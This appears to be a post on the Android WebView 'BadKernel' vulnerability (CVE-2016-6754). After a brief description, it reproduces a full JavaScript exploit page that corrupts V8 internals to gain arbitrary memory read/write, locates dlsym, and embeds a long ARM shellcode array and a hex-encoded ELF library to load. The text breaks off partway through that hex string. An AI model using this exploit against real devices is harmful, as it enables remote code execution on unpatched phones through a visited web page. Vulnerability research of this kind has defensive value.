CVE-2016-6754: Android – ‘BadKernel’ Remote Code Execution
Recently, a group of security researchers named 360 Alpha revealed a serious vulerability in WebView in Android. This vulnerability could enable a remote attacker to execute arbitrary code when the user is navigating to a website. This issue is rated as High due to the possibility of remote code execution in an unprivileged process. A remote code execution vulnerability in Webview in Android 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-11-05 could been affected by this vulerability.
You can get presentation slide here
Demo:
Exploit Wechat with BadKernel
http://video.weibo.com/player/1034:5bee6e775e81ad8b0486eaa519ea223b/v.swf
Exploit code:
<!-- author:@oldfresher -->
<html>
<div id="message" style="color: red;"></div>
<script>
function gc(){
for(var i=0;i<0x200000;i++){
new Array;
}
}
function to_hex(num){
return (num>>>0).toString(16);
}
function log (){
var str = "<h3>";
for(var i=0;i<arguments.length;i++){
str+=arguments[i];
}
str += "</h3>";
console.log(str);
document.write(str);
}
function set_access_address(address){
controllerdv.setUint32(3*4,address,true);
controllerdv.setUint32(4*4,0x40000000,true);
}
function get_dateview(address){
set_access_address(address);
if(this.controlleedv === undefined){
this.controlleedv = new DataView(controlee);
}
return this.controlleedv;
}
function read_uint32(from_address){
return get_dateview(from_address).getUint32(0,true);
}
function write_uint32(to_address,writed_value){
get_dateview(to_address).setUint32(0,writed_value,true);
}
function dumpHex(address){
str = "\n"
for(var i=0;i<20;i++){
str+=read_uint32(address+i*4).toString(16)+" ";
if(i%4==3)str+="\n";
}
log(str);
}
var kMessages;
Object.prototype.__defineGetter__("observe_accept_invalid",function(){
log("called");
kMessages=this});
try{Object.observe({},function(){},1)}catch(e){}
delete Object.prototype["observe_accept_invalid"];
kMessages["strict_read_only_property"].push("%3");
kMessages["object_not_extensible"].push("%3");
var args = null;
Array.prototype.__defineGetter__(3,function(){
log("3 get called");
args=this})
var p = Promise.defer();
Object.freeze(p.promise)
try{p.reject(1)}catch(e){}
var promiseStatusSymbole = args[0];
var flag = true;
Object.prototype.__defineSetter__(promiseStatusSymbole,function(){
log("set status called");
if(flag){Object.freeze(this)}})
try{new Promise(function(){})}catch(e){}
var promiseValueSymbol = args[0];
flag=false;
delete Object.prototype[promiseStatusSymbole];
flag = true;
Object.prototype.__defineSetter__(promiseValueSymbol,function(){
log("set status called");
if(flag){Object.freeze(this)}})
try{new Promise(function(){})}catch(e){}
var promiseOnResolveSymbol = args[0];
flag=false;
delete Object.prototype[promiseValueSymbol];
delete Array.prototype[3];
kMessages["strict_read_only_property"].pop();
kMessages["object_not_extensible"].pop();
var pro = new Promise(function(){});
var onResolve=pro[promiseOnResolveSymbol];
var InternalArray = Object.getPrototypeOf(onResolve)
var innerProto = {__proto__:null}
function toHex(str) {
var hex = '';
for(var i=0;i<str.length;i++) {
var temp = ("0"+ str.charCodeAt(i).toString(16)).substr(-2);
hex += temp;if(i%4==3)hex += ' ';
}
return hex;
}
var overwrite;
/*
0x5a0df8e8: 0x5a0df429 0x9f808531 0x00000003 0x00000020
0x5a0df8f8: 0x61616161 0x61616161 0x61616161 0x9f616161
0x5a0df908: 0x9f80af89 0x9fa08089 0x9fa08089 0x9ff9a000
0x5a0df918: 0x00004000 0x00000000 0x9ed38931 0x9fb08091
0x5a0df928: 0x00000000 0x00000000 0x9f808121 0x00000100
0x5a0df938: 0x000000c2 0x000000c2 0x000000c2 0x000000c2
*/
var ga;
Object.prototype.__defineSetter__.call(innerProto,0, function(val){
log("set 0 called");/*innerArray=this;*/
//set hole
//Object.defineProperty(this,0,{value:val});
}
)
var steps="leaking";
var controller=null;
Object.prototype.__defineGetter__.call(innerProto,0, function(){
if(steps==="leaking"){
this.length=1;
}else{
controller= new ArrayBuffer(0x1000);
disableHook();
steps="leaking";
var abStr = leakArrayBuffer();
log("internal Array length is "+this.length);
var oldLength = this.length;
for(var i=0;i<abStr.length;i++){
this[i+oldLength]=abStr.charCodeAt(i);
}
log(JSON.stringify(this));
}
log("get--- 0 called");
return 0x48;
}
);
function enalbeHook(){
Object.setPrototypeOf(InternalArray,innerProto)
}
function disableHook(){
Object.setPrototypeOf(InternalArray,null);
}
function str2dv(str){
var ab = new ArrayBuffer(str.length);
var dv = new DataView(ab);
for(var i=0;i<str.length;i++){
dv.setUint8(i,str.charCodeAt(i));
}
return dv;
}
function leakArrayBuffer(){
var encoded = "aaaaaaaa";
for(var i=0;i<7;i++)encoded+=encoded;
log("string length is "+encoded.length);
enalbeHook();
var encodedResult = encodeURI(encoded);
disableHook();
//find modified ArrayBuffer
log(toHex(encodedResult));
var pattern = String.fromCharCode(0x80,0x80,0x80,0,0x80,0x80,0x80,0,0x80,0x80,0x80,0);
var index = encodedResult.indexOf(pattern,36);
if(index==-1){
throw "find modified array buffer failed";
}
var str=encodedResult.substr(index-4,4);
controleeAddress=String.fromCharCode(str.charCodeAt(0)-1)+str.substr(1,3);
//find sprayed ArrayBuffer
pattern = String.fromCharCode(0x20,0,0,0,0,0,0,0);
index = encodedResult.indexOf(pattern,36);
log(toHex(encodedResult));
if(index==-1){
throw "find array buffer failed";
}
log("find array bufer at "+index);
var abStr = encodedResult.substr(index-16,12);
abStr += controleeAddress;
controleeAddress=str2dv(controleeAddress).getUint32(0,true);
abStr += String.fromCharCode(0,0,0,2);
log(toHex(abStr));
return abStr;
}
steps="overwrite";
//controller modify controlee
var controlee = new ArrayBuffer(0x10000);
controlee[0]={};//防止map改变
controlee[1]={};//防止map改变
controlee[2]={};//防止map改变
//spray
for(var i=0;i<0x200000/16;i++){new Array}//move controlee to old space
for(var i=0;i<0xc000;i++){
var ab=new ArrayBuffer(0x10);
ab[0]=controlee;
ab[1]=0x404040;
ab[2]=0x404040;
ab[3]=0x404040
};
var encoded2="1111";
enalbeHook();
var encodedResult = encodeURI(encoded2);
disableHook();
log("byte length of controller is "+controller.byteLength+typeof(controller));
if(typeof(controller)!="object"||controller.byteLength!=0x1000000){
alert("modify controller failed");
throw("error");
}
var controllerdv = new DataView(controller);
log("controller memory layout");
for(var i=0;i<10;i++){
log(("00000000"+controllerdv.getUint32(i*4).toString(16)).substr(-8));
}
//生成一块足够大的可读写内存
var huge_str = "eval('');";
for(var i=0;i<8000;i++) huge_str += 'a.a;';
huge_str += "return 10;";
var huge_func = new Function('a',huge_str);
huge_func({});
var text = new Text("");
var normalArrayBufferLength = 0x800000;
controlee[0]=new ArrayBuffer(normalArrayBufferLength);
controlee[1]=huge_func;
controlee[2]=text;
var normalArrayBuffer= controlee[0];
var controleeElementAddress = read_uint32(controleeAddress+8,true)-1;
dumpHex(controleeElementAddress);
var normalArrayBufferAddress = read_uint32(controleeElementAddress+8,true)-1;
var functionAddress = read_uint32(controleeElementAddress+12,true)-1;
var textAddress = read_uint32(controleeElementAddress+16,true)-1;
var normalArrayBufferBackingStore = read_uint32(normalArrayBufferAddress+3*4,true);
var rwxAddress = read_uint32(functionAddress+3*4);
var wrapperTypeInfo=read_uint32(textAddress+3*4);
log("rwxAddress "+to_hex(rwxAddress)+" wrapperTypeInfo "+to_hex(wrapperTypeInfo));
function find(start,len,pattern){
log("find start at "+ to_hex(start));
var dv = get_dateview(start);
for(var i=0;i<len-pattern.length*4;i++){
for(var j=0;j<pattern.length;j++){
if(dv.getUint32(i+j*4,true)!=pattern[j]) break;
}
if(j==pattern.length) return start+i;
}
alert("find failed");
}
//var magic_number=[0xeef6f71e,0xb1104604,0x47a02010];//get_elf_hwcap_from_getauxval,0x447949c3
var magic_number=[0xb1104604,0x47a02010,0x46284604];//get_elf_hwcap_from_getauxval,0x447949c3
var magic_position=find((wrapperTypeInfo&~0xfff)-0x1546000,0x2000000,magic_number);
log("find magic at "+to_hex(magic_position));//78 f6 bc ee
function get_dest_from_blx(addr) {
var val = read_uint32(addr);
var s = (val & 0x400) >> 10;
var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);
var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);
var i10h = val & 0x3ff;
var i10l = (val & 0x7fe0000) >> 17;
var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);
return ((addr + 4) & ~3) + off;
}
var dlsym_addr = get_dest_from_blx(magic_position-4);
log("dlsym address is "+to_hex(dlsym_addr));
var so_str="";
var shellcode = [0xf0,0x4f,0x2d,0xe9,0x2d,0xb0,0xa0,0xe3,0xa8,0x1b,0xdf,0xed,0x4f,0xdf,0x4d,0xe2,0x60,0xa0,0xa0,0xe3,0xa7,0x0b,0xdf,0xed,0x67,0x80,0xa0,0xe3,0x20,0xe0,0xa0,0xe3,0x18,0x00,0x8d,0xe5,0x78,0x00,0xa0,0xe3,0x00,0x30,0xa0,0xe3,0xf4,0xb0,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x74,0xc0,0xa0,0xe3,0x6f,0x50,0xa0,0xe3,0xf2,0x80,0xcd,0xe5,0x69,0x40,0xa0,0xe3,0x65,0x60,0xa0,0xe3,0xf8,0x00,0xcd,0xe5,0x64,0x10,0xa0,0xe3,0x73,0x70,0xa0,0xe3,0xf9,0xb0,0xcd,0xe5,0x5f,0x80,0xa0,0xe3,0xff,0xa0,0xcd,0xe5,0x6d,0x00,0xa0,0xe3,0x02,0xa1,0xcd,0xe5,0x61,0xb0,0xa0,0xe3,0x79,0xa0,0xa0,0xe3,0x1a,0x1b,0xcd,0xed,0xf3,0xe0,0xcd,0xe5,0x72,0x90,0xa0,0xe3,0xf6,0xe0,0xcd,0xe5,0xfe,0xe0,0xcd,0xe5,0x03,0x31,0xcd,0xe5,0x5e,0x30,0xcd,0xe5,0xf0,0x20,0xcd,0xe5,0xfa,0x20,0xcd,0xe5,0xf1,0x50,0xcd,0xe5,0xfb,0x50,0xcd,0xe5,0xf5,0xc0,0xcd,0xe5,0xfd,0xc0,0xcd,0xe5,0x5b,0xc0,0xcd,0xe5,0xf7,0x60,0xcd,0xe5,0x5c,0x60,0xcd,0xe5,0xfc,0x40,0xcd,0xe5,0x00,0x41,0xcd,0xe5,0x01,0x11,0xcd,0xe5,0x0c,0x11,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x5a,0x70,0xcd,0xe5,0x59,0xa0,0xcd,0xe5,0x25,0xa0,0xa0,0xe3,0x5d,0x00,0xcd,0xe5,0x6e,0x00,0xa0,0xe3,0x08,0x81,0xcd,0xe5,0x09,0x81,0xcd,0xe5,0x0a,0xb1,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x11,0x81,0xcd,0xe5,0x15,0x81,0xcd,0xe5,0x70,0x80,0xa0,0xe3,0x0b,0x01,0xcd,0xe5,0x67,0x00,0xa0,0xe3,0x16,0x81,0xcd,0xe5,0x6d,0x80,0xa0,0xe3,0x0d,0x91,0xcd,0xe5,0x54,0x80,0xcd,0xe5,0x90,0x80,0xcd,0xe5,0x70,0x80,0xa0,0xe3,0x14,0x01,0xcd,0xe5,0x6e,0x00,0xa0,0xe3,0x0e,0x51,0xcd,0xe5,0x10,0x11,0xcd,0xe5,0x13,0x51,0xcd,0xe5,0x17,0x91,0xcd,0xe5,0x50,0x10,0xcd,0xe5,0x79,0x10,0xa0,0xe3,0x91,0x80,0xcd,0xe5,0x70,0x80,0x8d,0xe2,0x92,0x90,0xcd,0xe5,0xe0,0x90,0x8d,0xe2,0x93,0x50,0xcd,0xe5,0x6e,0x50,0xa0,0xe3,0x1b,0x31,0xcd,0xe5,0x55,0x30,0xcd,0xe5,0x98,0x30,0xcd,0xe5,0x0f,0x41,0xcd,0xe5,0x12,0x21,0xcd,0xe5,0x18,0x41,0xcd,0xe5,0x19,0x01,0xcd,0xe5,0x68,0x00,0x8d,0xe2,0x1a,0xc1,0xcd,0xe5,0x51,0x20,0xcd,0xe5,0x52,0x70,0xcd,0xe5,0x53,0x10,0xcd,0xe5,0x03,0x10,0xa0,0xe1,0x30,0x80,0x8d,0xe5,0x34,0x90,0x8d,0xe5,0x94,0xc0,0xcd,0xe5,0x95,0x60,0xcd,0xe5,0x97,0xc0,0xcd,0xe5,0x63,0xc0,0xa0,0xe3,0xe0,0x40,0xcd,0xe5,0x68,0x40,0xa0,0xe3,0xe1,0x50,0xcd,0xe5,0x1c,0x0b,0xcd,0xed,0xe3,0x70,0xcd,0xe5,0x18,0x70,0x9d,0xe5,0xe6,0x20,0xcd,0xe5,0xe7,0x20,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0x96,0xc0,0xcd,0xe5,0xe2,0xe0,0xcd,0xe5,0x00,0x80,0x97,0xe5,0xe8,0xe0,0xcd,0xe5,0xea,0x20,0xcd,0xe5,0xed,0x20,0xcd,0xe5,0xee,0x30,0xcd,0xe5,0xe5,0x60,0xcd,0xe5,0x04,0x60,0x97,0xe5,0xe9,0xa0,0xcd,0xe5,0xec,0xa0,0xcd,0xe5,0xeb,0xb0,0xcd,0xe5,0xe4,0x40,0xcd,0xe5,0x38,0xff,0x2f,0xe1,0x50,0x10,0x8d,0xe2,0x36,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x42,0x1f,0x8d,0xe2,0x00,0x00,0xe0,0xe3,0x10,0xa0,0x9d,0xe5,0x3a,0xff,0x2f,0xe1,0x0c,0xb0,0x97,0xe5,0x2c,0x00,0x8d,0xe5,0xe0,0x20,0x8d,0xe2,0x08,0x30,0x97,0xe5,0x70,0x10,0x8d,0xe2,0x02,0x00,0xa0,0xe3,0x2c,0x90,0x9d,0xe5,0x00,0xb0,0x8d,0xe5,0x39,0xff,0x2f,0xe1,0x58,0x10,0x8d,0xe2,0x00,0x00,0xe0,0xe3,0x3a,0xff,0x2f,0xe1,0x00,0x30,0xa0,0xe1,0xf0,0x00,0x8d,0xe2,0x33,0xff,0x2f,0xe1,0x00,0x00,0xe0,0xe3,0x90,0x10,0x8d,0xe2,0x3a,0xff,0x2f,0xe1,0x00,0xc0,0xa0,0xe1,0x08,0x00,0x97,0xe5,0x01,0x00,0x70,0xe3,0x7d,0x01,0x00,0x0a,0x18,0xe0,0x9d,0xe5,0x01,0x5a,0x8e,0xe2,0xff,0x6e,0xc5,0xe3,0x07,0x20,0xa0,0xe3,0x0f,0xa0,0xc6,0xe3,0x0b,0x1a,0xa0,0xe3,0x01,0x0a,0x8a,0xe2,0x05,0x4a,0x85,0xe2,0x3c,0xff,0x2f,0xe1,0xbc,0xa2,0xd5,0xe1,0x1c,0x20,0x95,0xe5,0x00,0x00,0x5a,0xe3,0x02,0x20,0x85,0xe0,0x00,0xe0,0xa0,0x13,0x09,0x00,0x00,0x1a,0x1e,0x00,0x00,0xea,0x00,0xf0,0x20,0xe3,0x6c,0x69,0x62,0x63,0x2e,0x73,0x6f,0x00,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0xe0,0x8e,0xe2,0x20,0x20,0x82,0xe2,0x0a,0x00,0x5e,0xe1,0x15,0x00,0x00,0x2a,0x00,0xb0,0x92,0xe5,0x01,0x00,0x5b,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x90,0x92,0xe5,0x00,0x00,0x59,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x30,0xa0,0xe3,0x04,0xc0,0x92,0xe5,0x03,0x70,0x85,0xe0,0x03,0x00,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x30,0x83,0xe2,0x0c,0x80,0xd7,0xe7,0x01,0x80,0xc0,0xe7,0x10,0x60,0x92,0xe5,0x06,0x00,0x53,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0xa2,0xd5,0xe1,0x01,0xe0,0x8e,0xe2,0x20,0x20,0x82,0xe2,0x0a,0x00,0x5e,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x64,0xc0,0xa0,0xe3,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x20,0xe1,0xcd,0xe5,0x6e,0xa0,0xa0,0xe3,0x69,0x20,0xa0,0xe3,0x21,0xe1,0xcd,0xe5,0x6f,0x30,0xa0,0xe3,0x29,0xe1,0xcd,0xe5,0x12,0x8e,0x8d,0xe2,0x2d,0xe1,0xcd,0xe5,0x6c,0xe0,0xa0,0xe3,0x08,0x10,0xa0,0xe1,0x22,0xb1,0xcd,0xe5,0x67,0xb0,0xa0,0xe3,0x00,0x00,0xe0,0xe3,0x24,0xc1,0xcd,0xe5,0x28,0xc1,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x23,0xa1,0xcd,0xe5,0x31,0xa1,0xcd,0xe5,0x25,0x61,0xcd,0xe5,0x2f,0x61,0xcd,0xe5,0x26,0x31,0xcd,0xe5,0x2b,0x31,0xcd,0xe5,0x10,0x30,0x9d,0xe5,0x27,0x21,0xcd,0xe5,0x30,0x21,0xcd,0xe5,0x2a,0xe1,0xcd,0xe5,0x2c,0xb1,0xcd,0xe5,0x63,0xb0,0xa0,0xe3,0x2e,0xc1,0xcd,0xe5,0x32,0x71,0xcd,0xe5,0x33,0x91,0xcd,0xe5,0x33,0xff,0x2f,0xe1,0x70,0x20,0xa0,0xe3,0x73,0xe0,0xa0,0xe3,0x0c,0x00,0x8d,0xe5,0x6d,0xc0,0xa0,0xe3,0x61,0x70,0xcd,0xe5,0x60,0x10,0x8d,0xe2,0x62,0x60,0xcd,0xe5,0x10,0x30,0x9d,0xe5,0x00,0x00,0xe0,0xe3,0x65,0x20,0xcd,0xe5,0x60,0xe0,0xcd,0xe5,0x63,0xb0,0xcd,0xe5,0x64,0xc0,0xcd,0xe5,0x66,0x90,0xcd,0xe5,0x33,0xff,0x2f,0xe1,0xb2,0xe3,0xd5,0xe1,0x25,0x20,0xa0,0xe3,0x08,0x10,0xa0,0xe1,0x20,0xc0,0x95,0xe5,0xa8,0x90,0xcd,0xe5,0x78,0x30,0xa0,0xe3,0xa0,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa3,0x20,0xcd,0xe5,0x0e,0x81,0x8e,0xe0,0xa6,0x20,0xcd,0xe5,0x2c,0xe0,0xa0,0xe3,0x0c,0x20,0x85,0xe0,0xa1,0x30,0xcd,0xe5,0x88,0xc1,0x8c,0xe0,0xa2,0xe0,0xcd,0xe5,0xa5,0xe0,0xcd,0xe5,0x05,0xc0,0x8c,0xe0,0x14,0x20,0x8d,0xe5,0xa0,0x20,0x8d,0xe2,0x10,0x80,0x9c,0xe5,0xa4,0x30,0xcd,0xe5,0xa7,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x00,0xc0,0x8d,0xe5,0x0c,0xc0,0x9d,0xe5,0x08,0xe0,0x85,0xe0,0x6d,0x80,0xa0,0xe3,0x04,0xe0,0x8d,0xe5,0x08,0xe0,0x8d,0xe5,0x3c,0xff,0x2f,0xe1,0x64,0xe0,0xa0,0xe3,0x73,0x00,0xa0,0xe3,0x86,0x80,0xcd,0xe5,0x2e,0x30,0xa0,0xe3,0x79,0x20,0xa0,0xe3,0x83,0xa0,0xcd,0xe5,0x65,0x10,0xa0,0xe3,0x81,0xe0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x84,0x00,0xcd,0xe5,0x70,0x80,0xa0,0xe3,0x89,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x8c,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x8b,0xa0,0xcd,0xe5,0x8d,0x70,0xcd,0xe5,0x8e,0x60,0xcd,0xe5,0x49,0xc0,0xcd,0xe5,0x5f,0xc0,0xa0,0xe3,0x4a,0xe0,0xcd,0xe5,0x64,0xe0,0xa0,0xe3,0x4b,0x70,0xcd,0xe5,0xad,0x60,0xcd,0xe5,0xaf,0x00,0xcd,0xe5,0xb1,0x80,0xcd,0xe5,0x69,0x80,0xa0,0xe3,0xb2,0x00,0xcd,0xe5,0xb3,0x70,0xcd,0xe5,0xb9,0x60,0xcd,0xe5,0x82,0x20,0xcd,0xe5,0x85,0x20,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x87,0x90,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x4c,0x90,0xcd,0xe5,0xb4,0x90,0xcd,0xe5,0x80,0x30,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x48,0x30,0xcd,0xe5,0xac,0x30,0xcd,0xe5,0xb0,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xae,0x10,0xcd,0xe5,0xba,0x10,0xcd,0xe5,0xbb,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xbe,0x20,0xcd,0xe5,0xbf,0xa0,0xcd,0xe5,0xc6,0xa0,0xcd,0xe5,0x61,0xa0,0xa0,0xe3,0xc8,0x70,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xcb,0x60,0xcd,0xe5,0xcc,0x60,0xcd,0xe5,0xce,0x20,0xcd,0xe5,0x64,0x20,0xa0,0xe3,0xd3,0x70,0xcd,0xe5,0x6c,0x70,0xa0,0xe3,0xd6,0x60,0xcd,0xe5,0xda,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc9,0xc0,0xcd,0xe5,0x08,0xc0,0x9d,0xe5,0xbc,0x30,0xcd,0xe5,0xbd,0xe0,0xcd,0xe5,0xc0,0x90,0xcd,0xe5,0xc4,0x30,0xcd,0xe5,0xc5,0x80,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xca,0xa0,0xcd,0xe5,0xcd,0xa0,0xcd,0xe5,0xcf,0x90,0xcd,0xe5,0xd0,0x30,0xcd,0xe5,0xd1,0x20,0xcd,0xe5,0xd2,0xa0,0xcd,0xe5,0xd4,0xa0,0xcd,0xe5,0xd5,0x30,0xcd,0xe5,0xd7,0x10,0xcd,0xe5,0xd8,0x70,0xcd,0xe5,0xd9,0x30,0xcd,0xe5,0xdb,0x60,0xcd,0xe5,0xdc,0x90,0xcd,0xe5,0xb1,0x00,0x00,0x0a,0x48,0x10,0x8d,0xe2,0xc4,0x60,0x8d,0xe2,0x14,0x70,0x9d,0xe5,0x80,0x20,0x8d,0xe2,0x88,0x30,0x8d,0xe2,0x14,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0xac,0x00,0x8d,0xe2,0x0c,0x10,0x8d,0xe5,0xb8,0xe0,0x8d,0xe2,0xd0,0x10,0x8d,0xe2,0x38,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x0c,0x60,0xa0,0xe1,0x3c,0x90,0x8d,0xe5,0x1c,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x28,0xe0,0x8d,0xe5,0x40,0x10,0x8d,0xe5,0x44,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x1c,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x48,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xac,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x14,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x3c,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0xb0,0xc3,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x0c,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x44,0x40,0x9d,0xe5,0x3c,0x90,0x9d,0xe5,0x1c,0xa0,0x9d,0xe5,0x14,0x20,0x9d,0xe5,0x24,0x80,0x9d,0xe5,0x14,0xe0,0x9d,0xe5,0x14,0xc0,0x92,0xe5,0x10,0x70,0x98,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9e,0xe5,0xac,0x21,0xb0,0xe1,0x07,0x70,0x85,0xe0,0x03,0x30,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x00,0xa0,0xe3,0x1c,0x90,0x8d,0xe5,0x14,0x80,0x9d,0xe5,0x00,0x90,0xa0,0xe1,0x14,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x03,0x60,0xa0,0xe1,0x0c,0x50,0x8d,0xe5,0x10,0x50,0x9d,0xe5,0x10,0xb0,0x8d,0xe5,0x04,0x10,0x9a,0xe5,0x00,0x00,0xe0,0xe3,0x01,0x90,0x89,0xe2,0x00,0xb0,0x9a,0xe5,0x08,0xa0,0x8a,0xe2,0x51,0x24,0xef,0xe7,0x02,0xe2,0x96,0xe7,0x0e,0x10,0x87,0xe0,0x35,0xff,0x2f,0xe1,0x0b,0x00,0x84,0xe7,0x14,0x10,0x98,0xe5,0xa1,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x0c,0x50,0x9d,0xe5,0x06,0x30,0xa0,0xe1,0x10,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x14,0xa0,0x9d,0xe5,0x14,0x20,0x99,0xe5,0x10,0xc0,0x99,0xe5,0xa2,0x21,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x0c,0xc0,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x20,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x0c,0xe0,0xb2,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x92,0xe5,0x52,0x24,0xef,0xe7,0x02,0x22,0x83,0xe0,0x04,0x20,0x92,0xe5,0x04,0x20,0x82,0xe0,0x04,0x20,0x8e,0xe7,0x14,0xe0,0x99,0xe5,0xae,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x37,0x0b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x1e,0x0b,0x8d,0xed,0x03,0x90,0xa0,0x11,0x00,0x80,0xa0,0x13,0x78,0x60,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x10,0x9a,0xe5,0x10,0x90,0x89,0xe2,0x21,0x02,0x58,0xe1,0x09,0x00,0x00,0x2a,0x00,0x30,0x99,0xe5,0x06,0x10,0xa0,0xe1,0x01,0x80,0x88,0xe2,0x03,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x99,0xe5,0x07,0x60,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x6c,0x0c,0xe3,0x16,0x68,0xdf,0xe7,0x05,0x30,0xa0,0xe1,0x00,0x40,0x8d,0xe5,0x70,0x10,0x8d,0xe2,0xe0,0x20,0x8d,0xe2,0x2c,0x40,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x34,0xff,0x2f,0xe1,0x18,0x50,0x9d,0xe5,0x08,0x00,0x85,0xe2,0x36,0xff,0x2f,0xe1,0x4f,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x54,0x10,0x9f,0xe5,0x7f,0x45,0x04,0xe3,0x4c,0x46,0x44,0xe3,0x01,0x50,0x8f,0xe0,0x04,0x50,0x85,0xe2,0x04,0x70,0x15,0xe5,0xfa,0x0e,0x57,0xe3,0xfb,0xff,0xff,0x1a,0x00,0x80,0x95,0xe5,0x04,0x00,0x58,0xe1,0xf8,0xff,0xff,0x1a,0x77,0xfe,0xff,0xea,0x00,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x24,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x80,0xa0,0xe1,0x00,0xe0,0xa0,0xe1,0x8d,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,0x88,0xf7,0xff,0xff,0x00,0xf0,0x20,0xe3,];
var so_str = "7f454c4601010100000000000000000003002800010000000000000034000000442100000000000534002000080028001600150006000000340000003400000034000000000100000001000004000000040000000300000034010000340100003401000013000000130000000400000001000000010000000000000000000000000000000112000001120000050000000010000001000000881e0000882e0000882e00007c010000800100000600000000100000020000008c1e00008c2e00008c2e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070c40d0000c40d0000c40d00005800000058000000040000000400000052e57464881e0000882e0000882e0000780100007801000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d000000000000000000000012000000340000000000000000000000120000004b00000000000000000000001200000073000000000000000000000012000000870000000000000000000000120000008e00000000000000000000001200000097000000150c00005c010000120008009f000000000000000000000012000000a4000000000000000000000012000000ab000000000000000000000012000000b5000000000000000000000012000000bc000000000000000000000012000000c4000000000000000000000012000000c9000000000000000000000012000000d0000000000000000000000012000000d7000000000000000000000012000000dc000000000000000000000012000000e100000004300000000000001000f1ffe800000004300000000000001000f1ff